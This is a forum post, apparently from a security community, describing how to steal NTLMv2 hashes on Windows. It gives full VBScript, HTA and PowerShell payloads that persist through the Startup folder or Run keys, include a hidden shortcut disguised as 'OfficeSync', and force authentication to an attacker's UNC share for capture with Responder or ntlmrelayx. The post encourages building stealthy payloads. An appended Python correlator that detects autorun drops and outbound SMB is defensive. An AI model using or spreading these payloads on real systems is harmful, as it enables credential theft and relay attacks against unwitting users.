
Article: NTLMv2 Hash Leak via COM + Auto-Execution

stihl

Moderator
Because you still need to drop a script on the target machine (for example, by tricking a user into running a payload or planting it via social engineering), this is not considered 0-click, so no CVE.

Once you’ve done that, however, it runs entirely in the background and harvests NTLMv2 hashes without any further prompts.

Why It Works

  • Native auto-execution: Leverage login-time paths Windows trusts by default (Startup folder, Run-registry key).
  • Built-in COM objects: No exotic payloads or deprecated file types needed — just Shell.Application, Scripting.FileSystemObject, MSXML2.XMLHTTP and other COM objects.
  • Automatic NTLM auth: When your script points at a UNC share, Windows immediately tries to authenticate with NTLMv2.

Attack Flow

1. Plant your script

  • Copy your .vbs (or .ps1) into the user’s Startup folder
  • Or add a HKCU\…\Run registry entry

2. Instantiate COM components

Code:
Set sh = CreateObject("Shell.Application")
Set fso = CreateObject("Scripting.FileSystemObject")
Set http = CreateObject("MSXML2.XMLHTTP")

3. Trigger a UNC connection

Code:
sh.NameSpace "\\attacker-server\share"
http.Open "GET", "\\attacker-server\ping", False
http.Send

4. Capture the hash

  • Windows automatically negotiates NTLMv2 when accessing \\attacker-server\…
  • Attacker runs Responder, ntlmrelayx, or similar to grab and relay the hash

You can be really creative with your payload:

Copy-Item .\ntlmleak.vbs "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"

Code:
<job>
  <script language="VBScript">
On Error Resume Next
attacker = "\\xxxxxxx\leak"

Set sh = CreateObject("Shell.Application")
sh.NameSpace attacker

Set fso = CreateObject("Scripting.FileSystemObject")
fso.OpenTextFile attacker & "\trigger.txt", 1

Set http = CreateObject("MSXML2.XMLHTTP")
http.open "GET", attacker & "\test", False
http.send
</script>
</job>

The VBScript code leverages a combination of COM objects (Shell.Application, Scripting.FileSystemObject and MSXML2.XMLHTTP) to initiate outbound connections that trigger NTLM authentication attempts. While this example is written in VBScript, similar techniques can be implemented in other languages that support COM automation.

Get creative — mix and match .lnk, .vbs, .ps1 (or any combination of them) to craft a truly stealthy payload.

Code:
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\OfficeSync.lnk")
$Shortcut.TargetPath = "mshta.exe"
$Shortcut.Arguments = "\\xxxxxxxxx\leak\leak.hta"
$Shortcut.WindowStyle = 7  # Hidden
$Shortcut.IconLocation = "shell32.dll, 13"
$Shortcut.Save()

Code:
<html>
  <head>
<HTA:APPLICATION ID="NTLMLeak" APPLICATIONNAME="NTLMLeak" BORDER="thin" />
<script language="VBScript">
On Error Resume Next
attacker = "\\xxxxxxxxxx\leak"

' Shell COM object (triggers share access)
Set sh = CreateObject("Shell.Application")
sh.NameSpace attacker

' FileSystemObject COM
Set fso = CreateObject("Scripting.FileSystemObject")
fso.OpenTextFile attacker & "\trigger.txt", 1

' MSXML2
Set http = CreateObject("MSXML2.XMLHTTP")
http.open "GET", attacker & "\test", False
http.send

' IE COM nav to UNC path
Set ie = CreateObject("InternetExplorer.Application")
ie.Visible = False
ie.Navigate "file://" & attacker & "\xaml.xaml"

' Cleanup
Set sh = Nothing
Set fso = Nothing
Set http = Nothing
Set ie = Nothing
</script>
</head>
<body>
<h1>Loading...</h1>
</body>
</html>

Why You Care

  • Red-Team POV: Reliable persistence + credential grab in one step — no click-through dialogs, no Office macros.
  • Blue-Team POV: Prioritize detection on creation of unexpected Run-keys/Startup scripts and unusual SMB outbound attempts at user logon.
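As an added example from the defensive side (not code from the original post): a small Python correlator over constructed Sysmon-style events that flags the two signals the Blue-Team bullet names, an autorun drop into Startup/Run and an outbound SMB attempt from a script host, and raises the pair to high confidence when both occur in the same logon session. The event field names, the script-host list and the internal address ranges are assumptions.

```python
import ipaddress
from collections import defaultdict
# Constructed Sysmon-style events (not real telemetry): 11 = FileCreate,
# 13 = RegistryValueSet, 3 = NetworkConnect. Only the fields used here are kept.
SAMPLE_EVENTS = [
    {"id": 11, "host": "WS01", "user": "CORP\\alice", "image": "powershell.exe",
     "target": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\OfficeSync.lnk"},
    {"id": 13, "host": "WS01", "user": "CORP\\alice", "image": "reg.exe",
     "target": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
    {"id": 3, "host": "WS01", "user": "CORP\\alice", "image": "C:\\Windows\\System32\\mshta.exe",
     "dst_ip": "203.0.113.10", "dst_port": 445},
    {"id": 3, "host": "WS02", "user": "CORP\\bob", "image": "C:\\Windows\\explorer.exe",
     "dst_ip": "10.0.0.5", "dst_port": 445},
]
# Assumed list of script hosts the payloads above run under; extend as needed.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}
# Assumed internal ranges: SMB from a script host to anything else is suspicious.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
STARTUP_MARKER = "\\start menu\\programs\\startup\\"
RUN_KEY_MARKER = "\\software\\microsoft\\windows\\currentversion\\run\\"

def is_autorun_drop(ev):
    """FileCreate into a Startup folder, or a value set under a Run key."""
    target = ev.get("target", "").lower()
    return (ev["id"] == 11 and STARTUP_MARKER in target) or \
           (ev["id"] == 13 and RUN_KEY_MARKER in target)

def is_external_smb(ev):
    """NetworkConnect on 445 from a script host to a non-internal address."""
    if ev["id"] != 3 or ev.get("dst_port") != 445:
        return False
    proc = ev["image"].rsplit("\\", 1)[-1].lower()
    dst = ipaddress.ip_address(ev["dst_ip"])
    return proc in SCRIPT_HOSTS and not any(dst in net for net in INTERNAL_NETS)

def correlate(events):
    """Group hits per (host, user) logon session: {(host, user): [reason, ...]}."""
    hits = defaultdict(list)
    for ev in events:
        if is_autorun_drop(ev):
            hits[(ev["host"], ev["user"])].append("autorun-drop:" + ev["target"])
        elif is_external_smb(ev):
            hits[(ev["host"], ev["user"])].append(f"smb-out:{ev['image']}->{ev['dst_ip']}")
    return dict(hits)

def high_confidence(hits):
    """Sessions showing both an autorun drop and an external SMB attempt."""
    return [k for k, v in hits.items() if any(r.startswith("autorun-drop:") for r in v)
            and any(r.startswith("smb-out:") for r in v)]
```

In production the same two predicates map onto a SIEM query joined on logon session and a short time window after logon; the explorer.exe connection to an internal file server in the sample is deliberately left unflagged to show the noise the script-host and address filters remove.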